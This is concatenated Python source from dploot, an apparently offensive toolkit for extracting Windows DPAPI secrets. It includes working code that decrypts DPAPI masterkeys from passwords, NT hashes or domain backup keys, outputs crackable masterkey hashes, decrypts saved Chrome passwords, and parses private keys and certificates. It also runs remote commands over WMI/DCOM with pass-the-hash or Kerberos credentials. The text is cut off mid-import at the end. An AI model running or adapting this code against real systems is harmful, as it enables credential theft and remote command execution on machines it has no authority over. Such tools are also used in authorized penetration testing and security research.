    hklm_software_path = r"Windows/System32/config/SOFTWARE"

    def __init__(self, target=None) -> None:
        super().__init__(target)
        self.local_ops = None
        self.local_session = True
        self.smb_session = DPLootDummySession()
        # the following are functions that should never be called on this class.
        self.enable_remoteops = None
        self.reconnect = None


    def connect(self) -> "Any | None":
        return self.smb_session

    def is_admin(self) -> bool:
        return True

    def enable_localops(self, systemHive, force=False) -> None:
        if self.local_ops is not None and self.bootkey is not None and not force:
            return
        try:
            self.local_ops = LocalOperations(systemHive)
            self.bootkey = self.local_ops.getBootKey()
        except Exception as e:
            logging.error(f"LocalOperations failed: {e}")

    # we 'emulate' remote file operations by converting local os.DirEntry() to impacket.SharedFile()
    def _sharedfile_fromdirentry(d: os.DirEntry):
        (filesize, atime, mtime, ctime) = d.stat(follow_symlinks=False)[6:]
        attribs = 0
        if d.is_dir(follow_symlinks=False):
            attribs |= ATTR_DIRECTORY
        return SharedFile(ctime, atime, mtime, filesize, None, attribs, d.name, d.name)

    SharedFile.fromDirEntry = _sharedfile_fromdirentry

    def remote_list_dir(self, share, path, wildcard=True) -> list[SharedFile]:
        path = self.get_real_path(path)
        if not wildcard:
            raise NotImplementedError("Not implemented for wildcard == False")
        try:
            result = list(map(SharedFile.fromDirEntry, os.scandir(path)))
        except FileNotFoundError:
            result = []
        return result

    def list_users(self, share):
        users_dir_path = "Users\\*"
        directories = self.listPath(
            shareName=share, path=ntpath.normpath(users_dir_path)
        )
        return [d.get_longname() for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]

    def listPath(self, shareName: str = "C$", path: Optional[str] = None, password: Optional[str] = None):
        if path[-2:] == r"\*":
            return self.remote_list_dir(shareName, path[:-2], wildcard=True)
        if path[-1] == "*":
            return self.remote_list_dir(shareName, path[:-1], wildcard=True)
        else:
            raise NotImplementedError("Not implemented for wildcard == False")

    def getFile(self, *args, **kwargs) -> "Any | None":
        raise NotImplementedError("getFile is not implemented in LOCAL mode")

    def get_real_path(self, path:str) -> str:
        """Match path against file system (case insensitive if py>=3.12).
            Only used when target is `LOCAL`.

        Args:
            path (str): pah representation (ie C:\\Windows\\...)

        Returns:
            str: real path on the filesystem

        """
        # clean path (remove c:\, /, and current root if already present)
        path=path.removeprefix(self.target.local_root)
        if path[:3].lower() == "c:\\":
            path = path[3:]
        path=path.replace("\\", os.sep).lstrip(os.sep)

        globok = False
        # The pattern to match does not contain jokers, so Path.glob() should return 0 or 1 match
        try:
            path=next(Path(self.target.local_root).glob(path, case_sensitive=False))
            globok=True
        except (StopIteration, TypeError):
            # StopIteration: path does not exist.
            # TypeError: unexpexted keyword (case_sensitive added in python 3.12)
            # Return a representation of path anyway
            path=os.path.join(self.target.local_root, path)

        #logging.debug(f"get_real_path: [{globok=}] returning {path}")
        return str(path)

    def readFile(
        self,
        shareName,
        path,
        mode=FILE_OPEN,
        offset=0,
        password=None,
        shareAccessMode=FILE_SHARE_READ,
        bypass_shared_violation=False,
        looted_files=None
    ) -> bytes:
        data = None
        try:
            with open(self.get_real_path(path), "rb") as f:
                data = f.read()
        except Exception as e:
            logging.debug(f"Exception occurred while trying to read {path}: {e!r}")

        return data

    def getUsersProfiles(self) -> dict[str, str] | None:
        """Returns the list of user profiles (from registry) in a dict

        Each subkey of HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/ProfileList is a user SID,
        and the ProfileImagePath value inside is the path to the user's profile
        :return: dict of user_sid: path_to_profile

        """
        if self._usersProfiles is not None:
            return self._usersProfiles

        result = {}
        # open hive
        reg_file_path = self.get_real_path(self.hklm_software_path)
        reg = Registry(reg_file_path, isRemote=False)

        # open key
        key_path = "Microsoft\\Windows NT\\CurrentVersion\\ProfileList"
        parentKey = reg.findKey(key_path)
        if parentKey is None:
            logging.error(f"Key {key_path} not found in {reg_file_path}")
            return None

        for user_sid in reg.enumKey(parentKey):
            # get 'ProfileImagePath' value
            (_, path) = reg.getValue(
                ntpath.join(key_path, user_sid, "ProfileImagePath")
            )
            path = (
                path.decode("utf-16le")
                .rstrip("\0")
                .replace(r"%systemroot%", self.systemroot)
            )
            path = ntpath.normpath(path)
            path = self.get_real_path(path)
            # store in result dict
            result[user_sid] = path

        self._usersProfiles = result
        return self._usersProfiles


class DPLootDummySession:
    def login(*args, **kwargs) -> bool:
        return True



import logging
from binascii import hexlify
from Cryptodome.Hash import SHA1

from impacket.dpapi import (
    MasterKeyFile,
    MasterKey,
)

from dploot.lib.dpapi import decrypt_masterkey


class Masterkey:
    def __init__(self, guid, blob = None, sid:str = None, key = None, sha1 = None, user: str = "None") -> None:
        self.guid = guid
        self.blob = blob
        self.sid = str(sid).upper()
        self.user = user

        self.key = key
        self._sha1 = sha1

        if self.blob is not None:
            self.generate_hash()

    def __str__(self) -> str:
        return f"{{{self.guid}}}:{self.sha1}" if self.key is not None else ""

    def decrypt(self, domain_backupkey = None, password = None, nthash = None, dpapi_systemkey = None) -> bool:
        key = decrypt_masterkey(
            masterkey=self.blob,
            domain_backupkey=domain_backupkey,
            sid=self.sid,
            password=password,
            nthash=nthash,
            dpapi_systemkey=dpapi_systemkey
        )
        if key is not None:
            self.key = key
            return True
        return False
    
    def generate_hash(self):
        hashes = []
        mkf = MasterKeyFile(self.blob)
        data = self.blob[len(mkf) :]
        if mkf["MasterKeyLen"] > 0:
            mk = MasterKey(data[:mkf["MasterKeyLen"]])
            try:
                iteration_count = mk["MasterKeyIterationCount"]
                iv = hexlify(mk["Salt"]).decode("ascii")
                encryted_data = hexlify(mk["data"]).decode("ascii")
                version = 1 if len(encryted_data) == 208 else 2
                hash_algo = "sha1" if len(encryted_data) == 208 else "sha512"
                crypt_algo = "des3" if len(encryted_data) == 208 else "aes256"
                hashes = [f"{self.user}:$DPAPImk${version}*{context}*{self.sid}*{crypt_algo}*{hash_algo}*{iteration_count}*{iv}*{len(encryted_data)}*{encryted_data}"for context in [1,2,3]]    
            except Exception as e:
                import traceback
                traceback.print_exc()
                print(e)
        return hashes

    def dump(self) -> None:
        print(self)

    @property
    def sha1(self):
        if self._sha1 is not None:
            return self._sha1
        if self.key is not None:
            try:
                self._sha1 = hexlify(SHA1.new(self.key).digest()).decode("latin-1")
            except Exception as e:
                logging.debug(f"Could not generate sha1 for masterkey {self.guid}: {e}")
        return self._sha1



import logging
import time

from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dtypes import NULL

from dploot.lib.target import Target


class DPLootWmiExec:
    def __init__(self, target: Target = None):
        self.__username = target.username
        self.__password = target.password
        self.__domain = target.domain
        self.__lmhash = target.lmhash
        self.__nthash = target.nthash
        self.__aesKey = target.aesKey
        self.__addr = target.address
        self.__kdcHost = target.kdcHost
        self.__doKerberos = target.do_kerberos

        self.__share = "C$"
        self.__pwd = "C:\\"
        self.output = str(time.time())
        self.__win32Process = None

    def run(self, command):
        if logging.getLogger().level != logging.DEBUG:
            logging.getLogger("impacket").disabled = True
        dcom = DCOMConnection(
            self.__addr,
            self.__username,
            self.__password,
            self.__domain,
            self.__lmhash,
            self.__nthash,
            self.__aesKey,
            oxidResolver=True,
            doKerberos=self.__doKerberos,
            kdcHost=self.__kdcHost,
        )
        try:
            iInterface = dcom.CoCreateInstanceEx(
                wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
            )
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
            iWbemLevel1Login.RemRelease()
            self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
            self.execute_remote(command)
        except (Exception, KeyboardInterrupt) as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        dcom.disconnect()

    def execute_remote(self, command):
        self.__win32Process.Create(command, self.__pwd, None)



from binascii import hexlify
from hashlib import pbkdf2_hmac
from Cryptodome.Cipher import AES
from Cryptodome.Hash import HMAC, SHA1, MD4
from Cryptodome.PublicKey import RSA
from Cryptodome.Util.number import bytes_to_long
from impacket.dpapi import DPAPI_BLOB
from impacket.structure import Structure


# https://blog.nviso.eu/2019/08/28/extracting-certificates-from-the-windows-registry/
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpef/e051aba9-c9df-4f82-a42a-c13012c9d381
# WARNING: CRAPPY STRUCT INCOMING
class CERTBLOB_PROPERTY(Structure):
    structure = (
        ("PropertyID", "<I=0"),
        ("Reserved", "<I=0"),
        ("Length", "<I=0"),
        ("_Value", "_-Value", 'self["Length"]'),
        ("Value", ":"),
    )


class CERTBLOB:
    def __init__(self, data=None, alignment=0):
        self.attributes = 0
        self.der = None
        if data is not None:
            self.attributes = []
            remaining = data
            while len(remaining) > 0:
                attr = CERTBLOB_PROPERTY(remaining)
                self.attributes.append(attr)
                if attr["PropertyID"] == 32:
                    self.der = attr["Value"]
                remaining = remaining[len(attr) :]

    def dump(self):
        print("[CERTBLOB]")
        for attr in self.attributes:
            print("{}:\t\t{}".format(attr["PropertyID"], attr["Value"]))
        if self.der is not None:
            print()
            print("DER             : %s " % (self.der))

# CNG PART
class CNG_PROPERTY(Structure):
    structure = (
        ("StructLen", "<L=0"),
        ("Type", "<L=0"),
        ("Unknown", "<L=0"),
        ("NameLen", "<L=0"),
        ("PropertyLen", "<L=0"),
        ("_Name", "_-Name", 'self["NameLen"]'),
        ("Name", ":"),
        ("_Property", "_-Property", 'self["PropertyLen"]'),
        ("Property", ":"),
    )

    def dump(self):
        print("[CNG PROPERTY]")
        print("StructLen        : %8x (%d)" % (self["StructLen"], self["StructLen"]))
        print("Type             : %8x (%d)" % (self["Type"], self["Type"]))
        print("Unknown          : %8x (%d)" % (self["Unknown"], self["Unknown"]))
        print("NameLen          : %8x (%d)" % (self["NameLen"], self["NameLen"]))
        print("PropertyLen      : %8x (%d)" % (self["PropertyLen"], self["PropertyLen"]))
        print("Name             : %s" % (self["Name"].decode("utf-16le").rstrip("\0")))
        print("Property         : %s" % hexlify(self["Property"]))

class CNG_PROPERTIES:
    def __init__(self, data=None, alignment=0):
        remaining = data
        self.properties = []
        while len(remaining) > 0:
            prop = CNG_PROPERTY(remaining)
            self.properties.append(prop)
            remaining = remaining[len(prop) :]
    
    def __len__(self):
        length = 0
        for prop in self.properties:
            length += len(prop)
        return length
    
    def dump(self):
        for prop in self.properties:
            prop.dump()

class CNG_BLOB(Structure):
    structure = (
        ("Version", "<L=1"),
        ("Unknown", "<L=0"),
        ("NameLen", "<L=0"),
        ("Type", "<L=0"),
        ("PublicPropLen", "<L=0"),
        ("PrivatePropLen", "<L=0"),
        ("PrivateKeyLen", "<L=0"),
        ("Unknown2", "16s=b'\\x00'*16"),
        ("_Name", "_-Name", 'self["NameLen"]'),
        ("Name", ":"),
        ("_PublicProperties", "_-PublicProperties", 'self["PublicPropLen"]'),
        ("PublicProperties", ":", CNG_PROPERTIES),
        ("_PrivateProperties", "_-PrivateProperties", 'self["PrivatePropLen"]'),
        ("PrivateProperties", ":", DPAPI_BLOB),
        ("_PrivateKey", "_-PrivateKey", 'self["PrivateKeyLen"]'),
        ("PrivateKey", ":", DPAPI_BLOB),
    )

    def dump(self):
        print("[CNG BLOB]")
        print("Version          : %8x (%d)" % (self["Version"], self["Version"]))
        print("Unknown          : %8x (%d)" % (self["Unknown"], self["Unknown"]))
        print("NameLen          : %8x (%d)" % (self["NameLen"], self["NameLen"]))
        print("Type             : %8x (%d)" % (self["Type"], self["Type"]))
        print("PublicPropLen    : %8x (%d)" % (self["PublicPropLen"], self["PublicPropLen"]))
        print("PrivatePropLey   : %8x (%d)" % (self["PrivatePropLen"], self["PrivatePropLen"]))
        print("PrivateKeyLen    : %8x (%d)" % (self["PrivateKeyLen"], self["PrivateKeyLen"]))
        print("Unknown2         : %s " % (self["Unknown2"]))
        print("Name             : %s" % (self["Name"].decode("utf-16le").rstrip("\0")))
        print()
        print("PublicProperties:")
        self["PublicProperties"].dump()
        print()
        print("PrivateProperties:")
        self["PrivateProperties"].dump()
        print()
        print("PrivateKey:")
        self["PrivateKey"].dump()

class CHROME_KEY_DATA_BLOB(Structure):
    structure = (
        ("Magic", "<I"),
        ("Version", "<I"),
        ("KeyLen", "<I"),
        ("_Key", "_-Key", 'self["KeyLen"]'),
        ("Key", ":"),
        ("Remaining", ":")
    )

    def dump(self):
        print("[BCRYPT KEY DATA]")
        print("Magic            : %4x (%s)" % (self["Magic"], self["Magic"]))
        print("Version          : %4x (%d)" % (self["Version"], self["Version"]))
        print("KeyLen           : %4x (%d)" % (self["KeyLen"], self["KeyLen"]))
        print("Key              : %s" % hexlify(self["Key"]))
        print("Remaining              : %s" % hexlify(self["Remaining"]))

# https://github.com/SecureAuthCorp/impacket/pull/1120
# Private Decrypted Private Key
class PRIVATE_KEY_RSA(Structure):
    structure = (
        ("magic", "<L=0"),
        ("len1", "<L=0"),
        ("bitlen", "<L=0"),
        ("unk", "<L=0"),
        ("pubexp", "<L=0"),
        ("_modulus", "_-modulus", 'self["len1"]'),
        ("modulus", ":"),
        ("_prime1", "_-prime1", 'self["len1"] // 2'),
        ("prime1", ":"),
        ("_prime2", "_-prime2", 'self["len1"] // 2'),
        ("prime2", ":"),
        ("_exponent1", "_-exponent1", 'self["len1"] // 2'),
        ("exponent1", ":"),
        ("_exponent2", "_-exponent2", 'self["len1"]// 2'),
        ("exponent2", ":"),
        ("_coefficient", "_-coefficient", 'self["len1"] // 2'),
        ("coefficient", ":"),
        ("_privateExponent", "_-privateExponent", 'self["len1"]'),
        ("privateExponent", ":"),
    )

    def dump(self):
        print("magic             : %s " % (self["magic"]))
        print("len1              : %8x (%d)" % (self["len1"], self["len1"]))
        print("bitlen            : %8x (%d)" % (self["bitlen"], self["bitlen"]))
        print("pubexp            : %8x, (%d)" % (self["pubexp"], self["pubexp"]))
        print("modulus           : %s" % (hexlify(self["modulus"])))
        print("prime1            : %s" % (hexlify(self["prime1"])))
        print("prime2            : %s" % (hexlify(self["prime2"])))
        print("exponent1         : %s" % (hexlify(self["exponent1"])))
        print("exponent2         : %s" % (hexlify(self["exponent2"])))
        print("coefficient       : %s" % (hexlify(self["coefficient"])))
        print("privateExponent   : %s" % (hexlify(self["privateExponent"])))

    def __init__(self, data=None, alignment=0):
        Structure.__init__(self, data, alignment)
        chunk = int(self["bitlen"] / 16)
        self["modulus"] = self["modulus"][: chunk * 2]
        self["prime1"] = self["prime1"][:chunk]
        self["prime2"] = self["prime2"][:chunk]
        self["exponent1"] = self["exponent1"][:chunk]
        self["exponent2"] = self["exponent2"][:chunk]
        self["coefficient"] = self["coefficient"][:chunk]
        self["privateExponent"] = self["privateExponent"][: chunk * 2]


# PVK DPAPI BLOB when it has the SIG data
class PVKFile_SIG(Structure):
    structure = (
        ("Version", "<L=0"),
        ("unk1", "<L=0"),
        ("descrLen", "<L=0"),
        ("SigHeadLen", "<L=0"),
        ("SigPrivKeyLen", "<L=0"),
        ("HeaderLen", "<L=0"),
        ("PrivKeyLen", "<L=0"),
        ("crcLen", "<L=0"),
        ("SigFlagsLen", "<L=0"),
        ("FlagsLen", "<L=0"),
        ("_Description", "_-Description", 'self["descrLen"]'),
        ("Description", ":"),
        ("unk2", "<LLLLL=0"),
        ("_Rsaheader_new", "_-Rsaheader_new", 'self["SigHeadLen"]'),
        ("Rsaheader_new", ":"),
        ("_Blob", "_-Blob", 'self["SigPrivKeyLen"]'),
        ("Blob", ":", DPAPI_BLOB),
        ("_ExportFlag", "_-ExportFlag", 'self["SigFlagsLen"]'),
        ("ExportFlag", ":", DPAPI_BLOB),
    )

    def dump(self):
        print("[PVKFILE]")
        print("[RSAHEADER]")
        print("Version            : %8x (%d)" % (self["Version"], self["Version"]))
        print("descrLen           : %8x (%d)" % (self["descrLen"], self["descrLen"]))
        print(
            "SigHeadLen         : %8x (%d)" % (self["SigHeadLen"], self["SigHeadLen"])
        )
        print(
            "SigPrivKeyLen      : %8x (%d)"
            % (self["SigPrivKeyLen"], self["SigPrivKeyLen"])
        )
        print("HeaderLen          : %.8x (%d)" % (self["HeaderLen"], self["HeaderLen"]))
        print(
            "PrivKeyLen         : %.8x (%d)" % (self["PrivKeyLen"], self["PrivKeyLen"])
        )
        print("crcLen             : %.8x (%d)" % (self["crcLen"], self["crcLen"]))
        print(
            "SigFlagsLen        : %.8x (%d)"
            % (self["SigFlagsLen"], self["SigFlagsLen"])
        )
        print("FlagsLen           : %.8x (%d)" % (self["FlagsLen"], self["FlagsLen"]))
        print("Description   : %s" % (self["Description"]))
        print("Blank   : %s" % (self["unk2"]))
        print("RsaHeader : %s" % (hexlify(self["Rsaheader_new"]).decode("latin-1")))
        print("[PRIVATE KEY]")
        print(self["Blob"].dump())
        print("[FLAGS]")
        print(self["ExportFlag"].dump())


# PVK DPAPI BLOB without SIG
class PVKFile(Structure):
    structure = (
        ("Version", "<L=0"),
        ("unk1", "<L=0"),
        ("descrLen", "<L=0"),
        ("SiPublicKeyLen", "<L=0"),
        ("SiPrivKeyLen", "<L=0"),
        ("ExPublicKeyLen", "<L=0"),
        ("ExPrivKeyLen", "<L=0"),
        ("HashLen", "<L=0"),
        ("SiExportFlagLen", "<L=0"),
        ("ExExportFlagLen", "<L=0"),
        ("_Description", "_-Description", 'self["descrLen"]'),
        ("Description", ":"),
        ("unk2", "<LLLLL=0"),
        ("_PublicKey", "_-PublicKey", 'self["ExPublicKeyLen"]'),
        ("PublicKey", ":"),
        ("_Blob", "_-Blob", 'self["ExPrivKeyLen"]'),
        ("Blob", ":", DPAPI_BLOB),
        ("_ExportFlag", "_-ExportFlag", 'self["ExExportFlagLen"]'),
        ("ExportFlag", ":", DPAPI_BLOB),
    )

    def dump(self):
        print("[PVKFILE]")
        print("[RSAHEADER]")
        print("Version            : %8x (%d)" % (self["Version"], self["Version"]))
        print("descrLen           : %8x (%d)" % (self["descrLen"], self["descrLen"]))
        print(
            "SiPublicKeyLen         : %8x (%d)"
            % (self["SiPublicKeyLen"], self["SiPublicKeyLen"])
        )
        print(
            "SiPrivKeyLen      : %8x (%d)"
            % (self["SiPrivKeyLen"], self["SiPrivKeyLen"])
        )
        print(
            "ExPublicKeyLen          : %.8x (%d)"
            % (self["ExPublicKeyLen"], self["ExPublicKeyLen"])
        )
        print(
            "ExPrivKeyLen         : %.8x (%d)"
            % (self["ExPrivKeyLen"], self["ExPrivKeyLen"])
        )
        print("HashLen             : %.8x (%d)" % (self["HashLen"], self["HashLen"]))
        print(
            "SiExportFlagLen        : %.8x (%d)"
            % (self["SiExportFlagLen"], self["SiExportFlagLen"])
        )
        print(
            "ExExportFlagLen           : %.8x (%d)"
            % (self["ExExportFlagLen"], self["ExExportFlagLen"])
        )
        print("Description   : %s" % (self["Description"]))
        print("Blank   : %s" % (self["unk2"]))
        print("PublicKey : %s" % (hexlify(self["PublicKey"]).decode("latin-1")))
        print("[PRIVATE KEY]")
        print(self["Blob"].dump())
        print("[FLAGS]")
        print(self["ExportFlag"].dump())


# This class is the same as the previous two, its only used to see wich one of the previous clasess we will use
# sorry
class PVKHeader(Structure):
    structure = (
        ("Version", "<L=0"),
        ("unk1", "<L=0"),
        ("descrLen", "<L=0"),
        ("SigHeadLen", "<L=0"),
        ("SigPrivKeyLen", "<L=0"),
        ("HeaderLen", "<L=0"),
        ("PrivKeyLen", "<L=0"),
        ("crcLen", "<L=0"),
        ("SigFlagsLen", "<L=0"),
        ("FlagsLen", "<L=0"),
        ("_Description", "_-Description", 'self["descrLen"]'),
        ("Description", ":"),
        ("Remaining", ":"),
    )

    def dump(self):
        print("[PVKFILE]")
        print("[RSAHEADER]")
        print("Version            : %8x (%d)" % (self["Version"], self["Version"]))
        print("descrLen           : %8x (%d)" % (self["descrLen"], self["descrLen"]))
        print(
            "SigHeadLen         : %8x (%d)" % (self["SigHeadLen"], self["SigHeadLen"])
        )
        print(
            "SigPrivKeyLen      : %8x (%d)"
            % (self["SigPrivKeyLen"], self["SigPrivKeyLen"])
        )
        print("HeaderLen          : %.8x (%d)" % (self["HeaderLen"], self["HeaderLen"]))
        print(
            "PrivKeyLen         : %.8x (%d)" % (self["PrivKeyLen"], self["PrivKeyLen"])
        )
        print("crcLen             : %.8x (%d)" % (self["crcLen"], self["crcLen"]))
        print(
            "SigFlagsLen        : %.8x (%d)"
            % (self["SigFlagsLen"], self["SigFlagsLen"])
        )
        print("FlagsLen           : %.8x (%d)" % (self["FlagsLen"], self["FlagsLen"]))
        print("Description   : %s" % (self["Description"]))


def pvkblob_to_pkcs1(key):
    """
    Modified from impacket dpapi.py
    parse private key into pkcs#1 format
    :param key:
    :return:
    """
    modulus = bytes_to_long(key["modulus"][::-1])  # n
    prime1 = bytes_to_long(key["prime1"][::-1])  # p
    prime2 = bytes_to_long(key["prime2"][::-1])  # q
    _ = bytes_to_long(key["exponent1"][::-1])
    _ = bytes_to_long(key["exponent2"][::-1])
    _ = bytes_to_long(key["coefficient"][::-1])
    privateExp = bytes_to_long(key["privateExponent"][::-1])  # d
    pubExp = int(key["pubexp"])  # e

    return RSA.construct((modulus, pubExp, privateExp, prime1, prime2))


def decrypt_chrome_password(encrypted_password: str, aeskey: bytes):
    version, rest = encrypted_password[:3], encrypted_password[3:]
    iv, payload = rest[:12], rest[12:]
    cipher = AES.new(aeskey, AES.MODE_GCM, iv)
    decrypted = cipher.decrypt(payload)
    decrypted = decrypted[:-16]
    return decrypted or None

def deriveKeysFromUser(sid, password):
    password = password.encode("utf-16le")
    z_sid = (sid + "\0").encode("utf-16le")
    password_md4 = MD4.new(password).digest()
    # Will generate two keys, one with SHA1 and another with MD4
    key1 = HMAC.new(SHA1.new(password).digest(), z_sid, SHA1).digest()
    key2 = HMAC.new(password_md4, z_sid, SHA1).digest()
    # For Protected users
    sid = sid.encode("utf-16le")
    tmpKey = pbkdf2_hmac("sha256", password_md4, sid, 10000)
    tmpKey2 = pbkdf2_hmac("sha256", tmpKey, sid, 1)[:16]
    key3 = HMAC.new(tmpKey2, z_sid, SHA1).digest()[:20]

    return key1, key2, key3

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2, strict=False)])

def deriveKeysFromUserkey(sid, nthash):
    key1 = HMAC.new(nthash, (sid + "\0").encode("utf-16le"), SHA1).digest()  # SHA1
    key2 = None

    if len(nthash) != 20:
        # Assume MD4
        # For Protected users
        tmpKey = pbkdf2_hmac("sha256", nthash, sid.encode("utf-16le"), 10000)
        tmpKey2 = pbkdf2_hmac("sha256", tmpKey, sid.encode("utf-16le"), 1)[:16]
        key2 = HMAC.new(tmpKey2, (sid + "\0").encode("utf-16le"), SHA1).digest()[:20]
    return key1, key2



from datetime import datetime, timedelta
import logging
import os
import random
import re
import string
from typing import Dict, List


def is_guid(value: str):
    guid = re.compile(
        r"^(\{{0,1}([0-9a-fA-F]{8})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{12})\}{0,1})$"
    )
    return guid.match(value)


def find_guid(value: str):
    guid = re.compile(
        r"(([0-9a-fA-F]{8})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{12}))"
    )
    return guid.search(value).group()


def find_sha1(value: str):
    guid = re.compile(r"([a-f0-9]{40})")
    return guid.search(value).group()


def is_certificate_guid(value: str):
    guid = re.compile(
        r"^(\{{0,1}([0-9a-fA-F]{32})_([0-9a-fA-F]{8})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-([0-9a-fA-F]{12})\}{0,1})$"
    )
    return guid.match(value)


def is_credfile(value: str):
    guid = re.compile(r"[A-F0-9a-f]{32}")
    return guid.match(value)


def handle_outputdir_option(directory: str) -> str:
    if directory is not None and directory != "":
        if not os.path.exists(directory):
            os.makedirs(directory, 0o744)
        elif not os.path.isdir(directory):
            logging.error("Output Directory exists and is a file, exiting...")
            os.exit(1)
        return directory
    return None


def get_random_chars(size: int = 10) -> str:
    charset = string.ascii_uppercase + string.digits + string.ascii_lowercase
    return "".join(random.choice(charset) for i in range(size))


def datetime_to_time(timestamp_utc) -> str:
    return (datetime(1601, 1, 1) + timedelta(microseconds=timestamp_utc)).strftime(
        "%b %d %Y %H:%M:%S"
    )

def dump_looted_files_to_disk(output_dir, looted_files) -> None:
    for path, file_content in looted_files.items():
        local_filepath = os.path.join(output_dir, path)
        os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
        with open(local_filepath,"wb") as f:
            if file_content is None:
                file_content = b""
            f.write(file_content)

def parse_file_as_list(filename: str) -> List[str]:
    with open(filename) as lines:
        return [line.rstrip("\n") for line in lines]


def parse_file_as_dict(filename: str) -> Dict[str, str]:
    arr = {}
    with open(filename) as lines:
        for line in lines:
            tmp_line = line.rstrip("\n")
            tmp_line = tmp_line.split(":", 1)
            arr[tmp_line[0]] = tmp_line[1]
    return arr

def add_general_args(parser):
    parser.add_argument("-debug", action="store_true", help="Turn DEBUG output ON")

    parser.add_argument(
        "-quiet", action="store_true", help="Only output dumped credentials"
    )

    parser.add_argument(
        "-export-dir",
        action="store",
        metavar="DIR",
        help=(
            "Dump looted files to specified directory, regardless they were decrypted"
        ),
    )


import argparse
import sys
from typing import Optional

from dploot.lib.utils import add_general_args


class Target:
    def __init__(self) -> None:
        self.domain: str = None
        self.username: str = None
        self.password: str = None
        self.address: str = None
        self.hashes: str = None
        self.lmhash: str = None
        self.nthash: str = None
        self.do_kerberos: bool = False
        self.kdcHost: str = None
        self.use_kcache: bool = False
        self.dc_ip: str = None
        self.aesKey: str = None
        self.local_root: str = None
        self.is_local: bool = False

    @staticmethod
    def from_options(options) -> "Target":
        if options.dc_ip is None:
            options.dc_ip = options.target

        return Target.create(
            domain=options.domain,
            username=options.username if options.username is not None else "",
            password=options.password if options.password is not None else "",
            target=options.target,
            hashes=options.hashes,
            lmhash=None,
            nthash=None,
            do_kerberos=options.k or options.aesKey is not None or options.use_kcache,
            kdcHost=options.kdcHost,
            use_kcache=options.use_kcache,
            no_pass=options.no_pass,
            dc_ip=options.dc_ip,
            aesKey=options.aesKey,
            local_root=options.localroot,
        )

    @staticmethod
    def create(
        domain: Optional[str] = None,
        username: str = "",
        password: str = "",
        target: Optional[str] = None,
        hashes: Optional[str] = None,
        lmhash: str = "",
        nthash: str = "",
        do_kerberos: bool = False,
        kdcHost: Optional[str] = None,
        use_kcache: bool = False,
        no_pass: bool = False,
        dc_ip: Optional[str] = None,
        aesKey: Optional[str] = None,
        local_root: Optional[str] = None,
    ) -> "Target":
        self = Target()

        if target == "LOCAL":
            self.is_local = True

        if self.is_local is True:
            if do_kerberos or use_kcache or kdcHost is not None:
                print(
                    "Invalid options: Use kerberos does not make sense when target=LOCAL",
                    file=sys.stderr,
                )
                sys.exit(1)
            if dc_ip is not None and dc_ip != "LOCAL":
                print(
                    "Invalid options: dc-ip conflicts with target=LOCAL",
                    file=sys.stderr,
                )
                sys.exit(1)

        if domain is None:
            domain = ""

        if (
            not password
            and username != ""
            and lmhash == ""
            and nthash == ""
            and hashes is None
            and aesKey is None
            and no_pass is not True
            and do_kerberos is not True
            and self.is_local is not True
        ):
            from getpass import getpass

            password = getpass("Password:")

        if hashes is not None:
            hashes = hashes.split(":")
            if len(hashes) == 1:
                (nthash,) = hashes
                lmhash = nthash
            else:
                lmhash, nthash = hashes
        elif lmhash is None and nthash is None:
            lmhash = nthash = ""

        if dc_ip is None:
            dc_ip = target

        self.domain = domain
        self.username = username
        self.password = password
        self.address = target
        self.lmhash = lmhash
        self.nthash = nthash
        self.do_kerberos = do_kerberos or aesKey is not None or use_kcache
        self.kdcHost = kdcHost
        self.use_kcache = use_kcache
        self.dc_ip = dc_ip
        self.aesKey = aesKey
        self.local_root = local_root

        return self

    def __repr__(self) -> str:
        return "<Target (%s)>" % repr(self.__dict__)


def add_target_argument_group(
    parser: argparse.ArgumentParser,
) -> None:
    parser.add_argument(
        "-t",
        "-target",
        action="store",
        dest="target",
        metavar="<target name or address>",
        help="Target ip or address, or LOCAL",
    )

    parser.add_argument(
        "-d",
        "-domain",
        metavar="domain.local",
        dest="domain",
        action="store",
        help="Domain name",
    )

    parser.add_argument(
        "-u",
        "-username",
        metavar="username",
        dest="username",
        action="store",
        help="Username",
    )

    parser.add_argument(
        "-p",
        "-password",
        metavar="password",
        dest="password",
        action="store",
        help="Password",
    )

    add_general_args(parser)

    group = parser.add_argument_group("authentication")

    group.add_argument(
        "-hashes",
        action="store",
        metavar="LMHASH:NTHASH",
        help="NTLM hashes, format is LMHASH:NTHASH",
    )
    group.add_argument(
        "-no-pass", action="store_true", help="don't ask for password (useful for -k)"
    )
    group.add_argument("-k", action="store_true", help="Use Kerberos authentication")
    group.add_argument(
        "-aesKey",
        action="store",
        metavar="hex key",
        help="AES key to use for Kerberos Authentication (128 or 256 bits)",
    )
    group.add_argument(
        "-use-kcache",
        action="store_true",
        help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
    )
    group.add_argument(
        "-kdcHost",
        help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
    )
    group.add_argument(
        "-dc-ip",
        action="store",
        metavar="ip address",
        help=(
            "IP Address of the domain controller. If omitted it will use the domain "
            "part (FQDN) specified in the target parameter"
        ),
    )
    group.add_argument(
        "-root",
        action="store",
        dest="localroot",
        metavar="path",
        default=".",
        help=(
            "Root directory (for local operations). This directory should contain Windows and Users subdirectories"
        ),
    )



import argparse
import importlib.metadata
import logging
import sys
import traceback

from impacket.examples import logger

from dploot.action import (
    backupkey,
    blob,
    browser,
    certificates,
    cng,
    credentials,
    machinecertificates,
    machinecng,
    machinecredentials,
    machinemasterkeys,
    machinetriage,
    machinevaults,
